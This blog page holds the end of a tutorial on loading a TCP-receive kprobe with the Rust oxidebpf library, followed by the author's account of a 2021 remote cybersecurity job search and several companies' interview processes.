<span class="n">u32</span> <span class="n">gid</span><span class="p">;</span>
<span class="p">}</span> <span class="n">pid_tgid_msg</span><span class="p">;</span>
</code></pre></div></div>
<p>Now we can add a new program that will get the current PID and send it through
the <code class="language-plaintext highlighter-rouge">perf</code> map.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">__attribute__</span><span class="p">((</span><span class="n">section</span><span class="p">(</span><span class="s">"kprobe/trace_pid_event"</span><span class="p">),</span> <span class="n">used</span><span class="p">))</span> <span class="kt">int</span> <span class="nf">test_program</span><span class="p">(</span><span class="k">struct</span> <span class="n">pt_regs</span> <span class="o">*</span><span class="n">regs</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">u32</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">bpf_get_current_pid_tgid</span><span class="p">();</span>
<span class="n">u32</span> <span class="n">tgid</span> <span class="o">=</span> <span class="n">bpf_get_current_pid_tgid</span><span class="p">()</span> <span class="o">>></span> <span class="mi">32</span><span class="p">;</span>
<span class="n">u32</span> <span class="n">uid</span> <span class="o">=</span> <span class="n">bpf_get_current_uid_gid</span><span class="p">();</span>
<span class="n">u32</span> <span class="n">gid</span> <span class="o">=</span> <span class="n">bpf_get_current_uid_gid</span><span class="p">()</span> <span class="o">>></span> <span class="mi">32</span><span class="p">;</span>
<span class="n">pid_tgid_msg</span> <span class="n">msg</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">.</span><span class="n">pid</span> <span class="o">=</span> <span class="n">pid</span><span class="p">,</span>
<span class="p">.</span><span class="n">tgid</span> <span class="o">=</span> <span class="n">tgid</span><span class="p">,</span>
<span class="p">.</span><span class="n">uid</span> <span class="o">=</span> <span class="n">uid</span><span class="p">,</span>
<span class="p">.</span><span class="n">gid</span> <span class="o">=</span> <span class="n">gid</span><span class="p">,</span>
<span class="p">};</span>
<span class="n">bpf_perf_event_output</span><span class="p">(</span><span class="n">regs</span><span class="p">,</span> <span class="o">&</span><span class="n">pid_events</span><span class="p">,</span> <span class="n">bpf_get_smp_processor_id</span><span class="p">(),</span>
<span class="o">&</span><span class="n">msg</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">msg</span><span class="p">));</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
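<p>Both helpers used above return two 32-bit values packed into a single 64-bit integer,
which is why the C code takes the value once as-is (truncated to <code class="language-plaintext highlighter-rouge">u32</code>) and once
shifted right by 32. The same split, written as a small Rust sketch with a hypothetical
helper name, looks like this:</p>

```rust
/// Splits a packed 64-bit value into (lower 32 bits, upper 32 bits).
/// For bpf_get_current_pid_tgid() that is (pid, tgid) in the naming used
/// by the C program above; for bpf_get_current_uid_gid() it is (uid, gid).
fn split_packed(packed: u64) -> (u32, u32) {
    let lower = packed as u32; // truncating cast keeps the low half
    let upper = (packed >> 32) as u32;
    (lower, upper)
}

fn main() {
    // Example value: upper half 1234, lower half 5678.
    let packed: u64 = (1234u64 << 32) | 5678;
    let (lower, upper) = split_packed(packed);
    println!("lower = {}, upper = {}", lower, upper);
}
```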
<p>Finally, we change the license of the program to <code class="language-plaintext highlighter-rouge">GPL</code> so we can do useful work
(the verifier will reject calling <code class="language-plaintext highlighter-rouge">bpf_perf_event_output()</code> from a proprietary
program).</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">char</span> <span class="n">_license</span><span class="p">[]</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">section</span><span class="p">(</span><span class="s">"license"</span><span class="p">),</span> <span class="n">used</span><span class="p">))</span> <span class="o">=</span> <span class="s">"GPL"</span><span class="p">;</span>
</code></pre></div></div>
<p>We can build this with <code class="language-plaintext highlighter-rouge">docker compose run --rm test-builder</code>, giving us a
<code class="language-plaintext highlighter-rouge">test_program_x86_64</code>.</p>
<p>Our project directory now looks like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.
├── Cargo.toml
├── bpf
│ ├── Dockerfile
│ ├── Makefile
│ ├── docker-compose.yml
│ ├── test_program.c
│ └── test_program_x86_64
└── src
└── main.rs
</code></pre></div></div>
<p>Now we can start writing our Rust code. First, we need to add some dependencies
to our <code class="language-plaintext highlighter-rouge">Cargo.toml</code>.</p>
<div class="language-toml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="py">oxidebpf</span> <span class="p">=</span> <span class="s">"0.1.0"</span>
<span class="py">users</span> <span class="p">=</span> <span class="s">"0.11.0"</span>
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">users</code> library will help us find a username from <code class="language-plaintext highlighter-rouge">uid</code> more easily. Now we
can import the libraries into our <code class="language-plaintext highlighter-rouge">main.rs</code>.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">oxidebpf</span><span class="p">::{</span><span class="n">Program</span><span class="p">,</span> <span class="n">ProgramBlueprint</span><span class="p">,</span> <span class="n">ProgramGroup</span><span class="p">,</span> <span class="n">ProgramType</span><span class="p">,</span> <span class="n">ProgramVersion</span><span class="p">};</span>
<span class="k">use</span> <span class="nn">users</span><span class="p">::</span><span class="n">get_user_by_id</span><span class="p">;</span>
<span class="k">use</span> <span class="nn">std</span><span class="p">::</span><span class="nn">convert</span><span class="p">::</span><span class="n">TryInto</span><span class="p">;</span>
</code></pre></div></div>
<p>Now we can start working on our main function. First we bring in the BPF
program binary and load it as a blueprint.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">let</span> <span class="n">bytes</span> <span class="o">=</span> <span class="nd">include_bytes!</span><span class="p">(</span><span class="s">"../bpf/test_program_x86_64"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">program_blueprint</span> <span class="o">=</span> <span class="nn">ProgramBlueprint</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="n">bytes</span><span class="p">,</span> <span class="nb">None</span><span class="p">)</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"could not read program"</span><span class="p">);</span>
</code></pre></div></div>
<p>Next, we create a <code class="language-plaintext highlighter-rouge">Program</code> from the blueprint, specifying <code class="language-plaintext highlighter-rouge">tcp_recvmsg</code> as the
attach point.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">let</span> <span class="n">program</span> <span class="o">=</span> <span class="nn">Program</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span>
<span class="nn">ProgramType</span><span class="p">::</span><span class="n">Kprobe</span><span class="p">,</span>
<span class="s">"trace_pid_event"</span><span class="p">,</span>
<span class="nd">vec!</span><span class="p">[</span><span class="s">"tcp_recvmsg"</span><span class="p">],</span>
<span class="p">);</span>
</code></pre></div></div>
<p>Then we create a <code class="language-plaintext highlighter-rouge">ProgramGroup</code> (more on that later), which will load and
manage our programs.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">let</span> <span class="k">mut</span> <span class="n">program_group</span> <span class="o">=</span> <span class="nn">ProgramGroup</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nb">None</span><span class="p">);</span>
</code></pre></div></div>
<p>Now we put the <code class="language-plaintext highlighter-rouge">Program</code> in a <code class="language-plaintext highlighter-rouge">ProgramVersion</code> and tell the <code class="language-plaintext highlighter-rouge">ProgramGroup</code> to load
the programs from the blueprint. Since our program communicates with us, we can
get a receiving channel back.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">program_group</span>
<span class="nf">.load</span><span class="p">(</span>
<span class="n">program_blueprint</span><span class="p">,</span>
<span class="nd">vec!</span><span class="p">[</span><span class="nn">ProgramVersion</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nd">vec!</span><span class="p">[</span><span class="n">program</span><span class="p">])],</span>
<span class="p">)</span>
<span class="nf">.expect</span><span class="p">(</span><span class="s">"could not load program group"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">rx</span> <span class="o">=</span> <span class="n">program_group</span>
<span class="nf">.get_receiver</span><span class="p">()</span>
<span class="nf">.expect</span><span class="p">(</span><span class="s">"could not get receiver channel"</span><span class="p">);</span>
</code></pre></div></div>
<p>And finally, we can read from the channel and display events to the end user.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">loop</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">msg</span> <span class="o">=</span> <span class="n">rx</span><span class="nf">.recv</span><span class="p">()</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"msg recv err"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">pid</span> <span class="o">=</span> <span class="nn">u32</span><span class="p">::</span><span class="nf">from_ne_bytes</span><span class="p">(</span><span class="n">msg</span><span class="na">.2</span><span class="p">[</span><span class="mi">0</span><span class="o">..</span><span class="mi">4</span><span class="p">]</span><span class="nf">.try_into</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">());</span>
<span class="k">let</span> <span class="n">uid</span> <span class="o">=</span> <span class="nn">u32</span><span class="p">::</span><span class="nf">from_ne_bytes</span><span class="p">(</span><span class="n">msg</span><span class="na">.2</span><span class="p">[</span><span class="mi">8</span><span class="o">..</span><span class="mi">12</span><span class="p">]</span><span class="nf">.try_into</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">());</span>
<span class="k">let</span> <span class="n">user</span> <span class="o">=</span> <span class="nf">get_user_by_uid</span><span class="p">(</span><span class="n">uid</span><span class="p">)</span><span class="nf">.unwrap</span><span class="p">();</span>
<span class="nd">println!</span><span class="p">(</span>
<span class="s">"User [{}] '{}' received TCP in process [{}] {}"</span><span class="p">,</span>
<span class="n">uid</span><span class="p">,</span>
<span class="n">user</span><span class="nf">.name</span><span class="p">()</span><span class="nf">.to_str</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">(),</span>
<span class="n">pid</span><span class="p">,</span>
<span class="nn">std</span><span class="p">::</span><span class="nn">fs</span><span class="p">::</span><span class="nf">read_to_string</span><span class="p">(</span><span class="nd">format!</span><span class="p">(</span><span class="s">"/proc/{}/cmdline"</span><span class="p">,</span> <span class="n">pid</span><span class="p">))</span><span class="nf">.unwrap</span><span class="p">()</span>
<span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>
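<p>The loop above reads the PID and UID from fixed byte offsets and calls <code class="language-plaintext highlighter-rouge">unwrap()</code>
on the result, so a short payload would panic. A minimal sketch of a more
defensive decoder, assuming the same layout as above (PID in bytes 0..4, UID in
bytes 8..12). The <code class="language-plaintext highlighter-rouge">TcpEvent</code> struct and <code class="language-plaintext highlighter-rouge">parse_event</code> function are
hypothetical names for illustration and are not part of oxidebpf:</p>

```rust
use std::convert::TryInto;

/// Hypothetical container for the two fields we expect in the raw payload.
#[derive(Debug, PartialEq)]
struct TcpEvent {
    pid: u32,
    uid: u32,
}

/// Decode the PID (bytes 0..4) and UID (bytes 8..12) from a raw payload.
/// Returns None instead of panicking when the buffer is too short.
fn parse_event(payload: &[u8]) -> Option<TcpEvent> {
    // `get` returns None for an out-of-range slice, and `?` propagates it.
    let pid = u32::from_ne_bytes(payload.get(0..4)?.try_into().ok()?);
    let uid = u32::from_ne_bytes(payload.get(8..12)?.try_into().ok()?);
    Some(TcpEvent { pid, uid })
}
```

<p>In the loop, something like <code class="language-plaintext highlighter-rouge">parse_event(&amp;msg.2)</code> could then replace the two
<code class="language-plaintext highlighter-rouge">from_ne_bytes</code> lines, skipping any event that comes back as <code class="language-plaintext highlighter-rouge">None</code>.</p>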
<p>The final <code class="language-plaintext highlighter-rouge">main()</code> function might look like this:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">bytes</span> <span class="o">=</span> <span class="nd">include_bytes!</span><span class="p">(</span><span class="s">"../bpf/test_program_x86_64"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">program_blueprint</span> <span class="o">=</span> <span class="nn">ProgramBlueprint</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="n">bytes</span><span class="p">,</span> <span class="nb">None</span><span class="p">)</span>
<span class="nf">.expect</span><span class="p">(</span><span class="s">"could not read program"</span><span class="p">);</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">program_group</span> <span class="o">=</span> <span class="nn">ProgramGroup</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nb">None</span><span class="p">);</span>
<span class="n">program_group</span>
<span class="nf">.load</span><span class="p">(</span>
<span class="n">program_blueprint</span><span class="p">,</span>
<span class="nd">vec!</span><span class="p">[</span><span class="nn">ProgramVersion</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nd">vec!</span><span class="p">[</span><span class="nn">Program</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span>
<span class="nn">ProgramType</span><span class="p">::</span><span class="n">Kprobe</span><span class="p">,</span>
<span class="s">"trace_pid_event"</span><span class="p">,</span>
<span class="nd">vec!</span><span class="p">[</span><span class="s">"tcp_recvmsg"</span><span class="p">],</span>
<span class="p">)])],</span>
<span class="p">)</span>
<span class="nf">.expect</span><span class="p">(</span><span class="s">"could not load program group"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">rx</span> <span class="o">=</span> <span class="n">program_group</span>
<span class="nf">.get_receiver</span><span class="p">()</span>
<span class="nf">.expect</span><span class="p">(</span><span class="s">"no channel returned"</span><span class="p">);</span>
<span class="k">loop</span> <span class="p">{</span>
<span class="k">let</span> <span class="n">msg</span> <span class="o">=</span> <span class="n">rx</span><span class="nf">.recv</span><span class="p">()</span><span class="nf">.expect</span><span class="p">(</span><span class="s">"msg recv err"</span><span class="p">);</span>
<span class="k">let</span> <span class="n">pid</span> <span class="o">=</span> <span class="nn">u32</span><span class="p">::</span><span class="nf">from_ne_bytes</span><span class="p">(</span><span class="n">msg</span><span class="na">.2</span><span class="p">[</span><span class="mi">0</span><span class="o">..</span><span class="mi">4</span><span class="p">]</span><span class="nf">.try_into</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">());</span>
<span class="k">let</span> <span class="n">uid</span> <span class="o">=</span> <span class="nn">u32</span><span class="p">::</span><span class="nf">from_ne_bytes</span><span class="p">(</span><span class="n">msg</span><span class="na">.2</span><span class="p">[</span><span class="mi">8</span><span class="o">..</span><span class="mi">12</span><span class="p">]</span><span class="nf">.try_into</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">());</span>
<span class="k">let</span> <span class="n">user</span> <span class="o">=</span> <span class="nf">get_user_by_uid</span><span class="p">(</span><span class="n">uid</span><span class="p">)</span><span class="nf">.unwrap</span><span class="p">();</span>
<span class="nd">println!</span><span class="p">(</span>
<span class="s">"User [{}] '{}' received TCP in process [{}] {}"</span><span class="p">,</span>
<span class="n">uid</span><span class="p">,</span>
<span class="n">user</span><span class="nf">.name</span><span class="p">()</span><span class="nf">.to_str</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">(),</span>
<span class="n">pid</span><span class="p">,</span>
<span class="nn">std</span><span class="p">::</span><span class="nn">fs</span><span class="p">::</span><span class="nf">read_to_string</span><span class="p">(</span><span class="nd">format!</span><span class="p">(</span><span class="s">"/proc/{}/cmdline"</span><span class="p">,</span> <span class="n">pid</span><span class="p">))</span><span class="nf">.unwrap</span><span class="p">()</span>
<span class="p">)</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>If we run this program in a Vagrant VM, we can see <code class="language-plaintext highlighter-rouge">sshd</code> receiving packets.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vagrant@vagrant:~$ sudo ./bpf-blog
User [1000] 'vagrant' received TCP in process [54392] sshd: vagrant@pts/0
User [1000] 'vagrant' received TCP in process [54392] sshd: vagrant@pts/0
</code></pre></div></div>
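<p>One caveat with printing <code class="language-plaintext highlighter-rouge">/proc/{pid}/cmdline</code> directly: the kernel separates
arguments in that file with NUL bytes, and the process may already have exited
by the time we read it, in which case <code class="language-plaintext highlighter-rouge">unwrap()</code> would panic. A small sketch of
one way to handle both cases. The helper names <code class="language-plaintext highlighter-rouge">format_cmdline</code> and
<code class="language-plaintext highlighter-rouge">read_cmdline</code> are made up for this example:</p>

```rust
use std::fs;

/// Turn the raw bytes of a /proc/<pid>/cmdline file into a printable string.
/// Arguments are NUL-separated, so we split on NUL and join with spaces.
fn format_cmdline(raw: &[u8]) -> String {
    raw.split(|b| *b == 0)
        .filter(|arg| !arg.is_empty())
        .map(|arg| String::from_utf8_lossy(arg).into_owned())
        .collect::<Vec<_>>()
        .join(" ")
}

/// Read the command line for `pid`, or None if the process is gone
/// or its /proc entry cannot be read.
fn read_cmdline(pid: u32) -> Option<String> {
    let raw = fs::read(format!("/proc/{}/cmdline", pid)).ok()?;
    Some(format_cmdline(&raw))
}
```

<p>The event loop could then fall back to a placeholder string when <code class="language-plaintext highlighter-rouge">read_cmdline</code>
returns <code class="language-plaintext highlighter-rouge">None</code> rather than crashing on a short-lived process.</p>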
<p>From here, the sky’s the limit!</p>
<script src="https://fast.wistia.com/embed/medias/zu6jwuuj45.jsonp" async=""></script>
<script src="https://fast.wistia.com/assets/external/E-v1.js" async=""></script>
<div class="wistia_responsive_padding" style="padding: 56.25% 0 0 0; position: relative;">
<div class="wistia_responsive_wrapper" style="height: 100%; left: 0; position: absolute; top: 0; width: 100%;">
<div class="wistia_embed wistia_async_zu6jwuuj45 seo=false videoFoam=true" style="height: 100%; position: relative; width: 100%;">
<p> </p><p> </p>
</div>
</div>
</div>
<p><em>A quick bootstrap example showing oxidebpf loading an eBPF program that
intercepts and prints a <code class="language-plaintext highlighter-rouge">curl google.com</code> command. The eBPF program can be
found in the <a href="https://github.com/redcanaryco/redcanary-ebpf-sensor">redcanary-ebpf-sensor
repo</a> under
<code class="language-plaintext highlighter-rouge">src/network-events.c</code>.</em></p>
<h2 id="how-is-the-project-structured">How is the project structured?</h2>
<p>You might be wondering why we wrapped our <code class="language-plaintext highlighter-rouge">Program</code> in a <code class="language-plaintext highlighter-rouge">ProgramVersion</code> and
loaded that <code class="language-plaintext highlighter-rouge">ProgramVersion</code> through a <code class="language-plaintext highlighter-rouge">ProgramGroup</code>. That stems from the
primary use case for oxidebpf: write once, run anywhere (ish).</p>
<p>A <code class="language-plaintext highlighter-rouge">Program</code> represents an individual BPF program, which may or may not work across
different kernel versions. Sometimes you’ll want to collect multiple <code class="language-plaintext highlighter-rouge">Program</code>s
together to achieve some functionality; we call this a <code class="language-plaintext highlighter-rouge">ProgramVersion</code>. The idea
is that you can group <code class="language-plaintext highlighter-rouge">Program</code>s that should run together on a specific kernel
version into the same <code class="language-plaintext highlighter-rouge">ProgramVersion</code>. But you may have multiple kernel versions
deployed in your environment, each requiring modified BPF programs, and you
don’t want to build a separate executable for each one. This is where the
<code class="language-plaintext highlighter-rouge">ProgramGroup</code> comes in. You can have a <code class="language-plaintext highlighter-rouge">ProgramVersion</code> for each kernel in your
environment and put them all in a <code class="language-plaintext highlighter-rouge">ProgramGroup</code>. The <code class="language-plaintext highlighter-rouge">ProgramGroup</code> will attempt
to load each version in turn until one succeeds, cleaning up after any version
that fails to load.</p>
<p>To recap: <code class="language-plaintext highlighter-rouge">Program</code>s work together to create some desired functionality (in our
example, we have one <code class="language-plaintext highlighter-rouge">Program</code> that returns a PID and UID), <code class="language-plaintext highlighter-rouge">ProgramVersion</code>s
group <code class="language-plaintext highlighter-rouge">Program</code>s together by an expected kernel version target (e.g., “this
<code class="language-plaintext highlighter-rouge">ProgramVersion</code> gets PIDs and UIDs on &lt; 4.17, and this <code class="language-plaintext highlighter-rouge">ProgramVersion</code> gets
PIDs and UIDs on &gt;= 4.17”), and <code class="language-plaintext highlighter-rouge">ProgramGroup</code>s combine <code class="language-plaintext highlighter-rouge">ProgramVersion</code>s to
run in as many places as possible (e.g., “this <code class="language-plaintext highlighter-rouge">ProgramGroup</code> will get PIDs and
UIDs”). The result is one executable you can run in multiple places, for
simplified deployment.</p>
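<p>The “try each version in turn until one succeeds” behavior can be sketched
without any BPF at all. The following is a toy model only, not oxidebpf’s
implementation: <code class="language-plaintext highlighter-rouge">Version</code>, <code class="language-plaintext highlighter-rouge">try_load</code>, and <code class="language-plaintext highlighter-rouge">load_first</code> are hypothetical names,
and the “load” step is faked with a simple minimum-kernel comparison:</p>

```rust
/// Hypothetical stand-in for a set of programs built for one kernel range.
struct Version {
    label: &'static str,
    min_kernel: (u32, u32),
}

/// Pretend loader: succeeds only if the running kernel is new enough.
/// A real loader would hand the programs to the kernel and report its error.
fn try_load(version: &Version, running: (u32, u32)) -> Result<(), String> {
    if running >= version.min_kernel {
        Ok(())
    } else {
        Err(format!(
            "{} needs kernel {}.{} or newer",
            version.label, version.min_kernel.0, version.min_kernel.1
        ))
    }
}

/// Try each version in order and return the label of the first that loads.
/// If none load, return every error that was collected along the way.
fn load_first(
    versions: &[Version],
    running: (u32, u32),
) -> Result<&'static str, Vec<String>> {
    let mut errors = Vec::new();
    for version in versions {
        match try_load(version, running) {
            Ok(()) => return Ok(version.label),
            // A real loader would also release anything partially loaded here.
            Err(e) => errors.push(e),
        }
    }
    Err(errors)
}
```

<p>Ordering matters in this model: putting the newest-kernel version first means
it is preferred wherever it works, with older variants acting as fallbacks.</p>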
<p>Now let’s look at the structure of the repository itself.</p>
<h3 id="src"><code class="language-plaintext highlighter-rouge">src/</code></h3>
<ul>
<li>
<p><code class="language-plaintext highlighter-rouge">lib.rs</code> is the main interface to the library. It’s where the <code class="language-plaintext highlighter-rouge">Program</code>,
<code class="language-plaintext highlighter-rouge">ProgramVersion</code>, and <code class="language-plaintext highlighter-rouge">ProgramGroup</code> types live. It’s also where we export
a few other types to the public interface, such as <code class="language-plaintext highlighter-rouge">ArrayMap</code>. Things like
loading logic and event polling go here.</p>
</li>
<li>
<p><code class="language-plaintext highlighter-rouge">blueprint.rs</code> is where we parse BPF object files. It turns bytes into programs
and map definitions and helps us apply map relocations.</p>
</li>
<li>
<p><code class="language-plaintext highlighter-rouge">maps.rs</code> handles helpers and methods that surround specific map types, such as
<code class="language-plaintext highlighter-rouge">PerfMap</code> and <code class="language-plaintext highlighter-rouge">ArrayMap</code>.</p>
</li>
<li>
<p><code class="language-plaintext highlighter-rouge">error.rs</code> holds our custom error types.</p>
</li>
<li>
<p>The <code class="language-plaintext highlighter-rouge">bpf</code> module handles everything related to BPF system calls. Constants
go in <code class="language-plaintext highlighter-rouge">constant.rs</code>, general types in <code class="language-plaintext highlighter-rouge">mod.rs</code>, and syscall functions in
<code class="language-plaintext highlighter-rouge">syscall.rs</code>.</p>
</li>
<li>
<p>The <code class="language-plaintext highlighter-rouge">perf</code> module handles everything related to perf system calls. Similarly,
constants go in <code class="language-plaintext highlighter-rouge">constant.rs</code>, general types in <code class="language-plaintext highlighter-rouge">mod.rs</code>, and syscall functions in
<code class="language-plaintext highlighter-rouge">syscall.rs</code>.</p>
</li>
</ul>
<h3 id="test"><code class="language-plaintext highlighter-rouge">test/</code></h3>
<ul>
<li>
<p>This is where we keep the BPF program we use for running tests. Before you run
any tests on oxidebpf, you must first build the test program from this folder
with <code class="language-plaintext highlighter-rouge">docker-compose run --rm test-builder</code>.</p>
</li>
<li>
<p>The <code class="language-plaintext highlighter-rouge">test_program.c</code> provides some maps and probes for testing purposes, and the
included <code class="language-plaintext highlighter-rouge">Makefile</code> will build for both <code class="language-plaintext highlighter-rouge">x86_64</code> and <code class="language-plaintext highlighter-rouge">aarch64</code>.</p>
</li>
</ul>
<h3 id="vagrant"><code class="language-plaintext highlighter-rouge">vagrant/</code></h3>
<ul>
<li>This folder holds various subfolders with <code class="language-plaintext highlighter-rouge">Vagrantfile</code>s you can use for running
tests on a variety of distributions and kernels. Some are happy to run under
<code class="language-plaintext highlighter-rouge">sudo</code> (Ubuntu) while some require testing as <code class="language-plaintext highlighter-rouge">root</code> (CentOS and openSUSE).</li>
</ul>
<h2 id="whats-next">What’s next?</h2>
<p>One of the most common uses for BPF is to load and manage XDP programs, so one
of our immediate tasks will be to support XDP programs with the same simple
interface with which we support Kprobes and Uprobes. Instead of giving a kernel
symbol, you would give an interface and let oxidebpf take care of the rest.</p>
<p>After that, we will need to take care of more standard features such as
tracepoints and raw tracepoints. With those done we can move on to more
interesting security features, such as support for <a href="https://redcanary.com/blog/linux-security-testing/">Linux security
modules</a>. We’re also
hoping to get feedback from the security community to learn which features are
of interest for security tooling. If you have any ideas, <a href="https://github.com/redcanaryco/oxidebpf/pulls">submit a pull
request</a> or <a href="mailto:rafael@ortiz.sh">get in
touch</a>.</p>
<h2 id="keeping-up-to-date-with-kernel-support">Keeping up to date with kernel support</h2>
<p>As the kernel evolves and new BPF features are added, popular distributions
will gradually pick up more and more BPF-related capabilities. When these new
features gain sufficient market share they can be added to oxidebpf without
breaking the goal of write once, run (almost) anywhere. Also, thanks to the
efforts of kernel maintainers, oxidebpf should retain backwards compatibility
far into the future.</p>
<h2 id="how-can-i-contribute">How can I contribute?</h2>
<p>We welcome and encourage you to contribute if you find oxidebpf useful. You can
find the <a href="https://github.com/redcanaryco/oxidebpf">repository here</a> and the
<a href="https://github.com/redcanaryco/oxidebpf/blob/main/CODE_OF_CONDUCT.md">code of conduct
here</a>.</p>
<p>When contributing, please keep in mind our goal of “compile once, run (almost)
everywhere.” That doesn’t mean we’ll reject newer features, like BTF support.
It just means our own contributions will prioritize stabilizing features that
are supported by as many kernel versions as possible (or that at least fail
gracefully and clean up after themselves where unsupported). Ideally we’d like
to support any kernel version with eBPF, but a good rule of thumb is “will this
feature work or fail gracefully as early as kernel 4.4?”</p>
<p>Stay tuned for more updates!</p>Friday OrtizThis post was written for Red Canary and originally appeared on their site here.Looking for a Remote Cybersecurity Job in 20212021-08-07T17:00:00+00:002021-08-07T17:00:00+00:00https://ortiz.sh/work/2021/08/07/JOB-SEARCH<p>It’s been long enough that I’d like to document my job search and interview
process at a high level, hopefully for the benefit of others. If you’d like
to understand the position I was in before the job search, you can look
at my previous experiences <a href="/cv/">on my CV page</a>.</p>
<p><img src="/images/sankeymatic_2500x800.png" alt="a sankeymatic diagram of my job search" /></p>
<p>My criteria were: it had to be a security-focused role, it had to involve
hands-on technical work, and it had to be remote-first friendly.
Overall, I applied to 9 places, got 8 HR or recruiter screens, 6 hiring
manager interviews, 5 final round interviews, 2 offers, 2 rejections, and
1 out of time. I’m not going to go through all of them, but there are a few
processes I’d like to call out.</p>
<h1 id="trail-of-bits">Trail of Bits</h1>
<p>This was by far the most humane and straightforward process. I was ultimately
rejected, but I can’t even be upset about it. The process was:</p>
<ul>
<li>Recruiter screen</li>
<li>Interview with hiring manager</li>
<li>Time-boxed take-home assessment</li>
<li>Interview with team</li>
<li>Acceptance or rejection</li>
</ul>
<p>That’s it. Three calls, 30-60 minutes each, and one time-boxed assignment
that only took me a few hours to complete. Everyone was friendly, honest,
and fair. The assignment tested the skills of the role, didn’t take
an absurd amount of time to complete, and couldn’t be cheated by expending
undue effort. This is a model for other companies to follow.</p>
<h1 id="facebook">Facebook</h1>
<p>I want to call out how absurd this process is. I spoke with their recruiter,
who told me I would not be eligible for a remote position because they typically
only extend those to senior engineers, which requires 8 years of work experience,
and I only have 6. Strike one. They also recommended several books, study
materials, and practice courses, and said they generally advise people to study
for 6 months to 1 year to prepare for the Facebook interview process. Strike two.
Your corporation is evil and I don’t want to work there that badly. Then, once
the process starts, it can take a few months to complete, as there are several
long and intense interview loops where they make use of outdated concepts such
as whiteboarding. Strike three. I decided not to go any further; I was already
far along with several other companies.</p>
<p>The irony, of course, is that one of my work focuses now is BPF, which is the
product of many of the Linux Kernel engineers either employed by or sponsored
by Facebook. I’m sure I’d love to be on one of their teams, but not if this
is still the process.</p>
<h1 id="amazon">Amazon</h1>
<p>The recruiter who spoke to me was robotic. She blasted through every question
like a machine, and wrote my answers like a court stenographer. Rapid-fire and
inhuman. The hiring manager grilled me pretty aggressively on web security
trivia. The light in this person’s eyes had clearly gone out long ago. I can
still hear them saying “We are a data-driven company, Rafael,” when I asked
about their performance review process. Everything you do is logged, catalogued,
processed, and analyzed. Add to that the stack ranking controversy and I can see
why the recruiter was robotic: gotta get those metrics up! The hiring manager’s
crushed soul was the product of a soul-crushing environment. I asked some friends
who work at Amazon and enjoy it how they can possibly get by in this
environment. They said they loved the routine, they loved the data on themselves,
they loved being able to micro-optimize their behaviors to hit metrics and
quantitatively assess themselves. I guess. Definitely not for me, and I think
they could tell. I can’t imagine this environment produces much innovation, and
I’m a researcher at heart.</p>
<p>I’m glad they rejected me, I consider this one a bullet dodged.</p>
<h1 id="twilio">Twilio</h1>
<p>I don’t have many comments on the process itself; it was pretty much the same
as Red Canary and Blend. However, I do want to call out the people who work
there. This seems to be a company that really cares about their employees
and they make that evident in the interview process. The hiring manager was
incredibly friendly, and when discussing the benefits of the role mentioned
“there really aren’t enough worker protections in this country.” The fact that
a hiring manager can even say that openly to a candidate speaks volumes. They
rejected me in the final round because they had another candidate that solved
their immediate needs, but I’d apply again in the future.</p>
<h1 id="blend">Blend</h1>
<p>Pretty typical interview process. Started with a screen from a very friendly
recruiter, then a non-technical interview with the hiring manager. There was
a dead simple live coding exercise that was basically “before we move further
I need to know that you can actually write python.” It was low stress and fair.
Then we moved on to technical interviews with the hiring manager and the team.
Everyone I met there was an excellent human being, and I felt like it was the
most diverse team I had met in my interviewing process so kudos to them.</p>
<p>The red flags, unfortunately, came after I got an offer from them. They all
started adding me on LinkedIn and talking to me like I was already working there,
which felt just a tad pushy. The fact that everyone on the team did it weirded
me out a little. I got another offer from another company that had more cash
and less equity, but also aligned more with my interests (research). The
